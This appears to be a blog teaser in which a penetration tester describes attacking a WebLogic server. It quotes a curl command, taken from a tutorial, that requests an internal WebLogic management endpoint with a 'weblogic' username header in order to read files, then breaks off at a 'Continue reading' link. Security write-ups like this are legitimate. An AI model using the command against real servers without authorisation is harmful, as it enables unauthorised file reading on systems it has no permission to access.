During an external pentest – what a surprise – I found a WebLogic server with no interesting contents. I searched papers and tutorials about WebLogic hacking with little success. The public exploitation techniques resulted in only file reading. The OISSG tutorial only shows the following usable file reading solution: curl -s http://127.0.0.1/wl_management_internal2/wl_management -H "username: weblogic" … Continue reading WebLogic undocumented hacking
↧
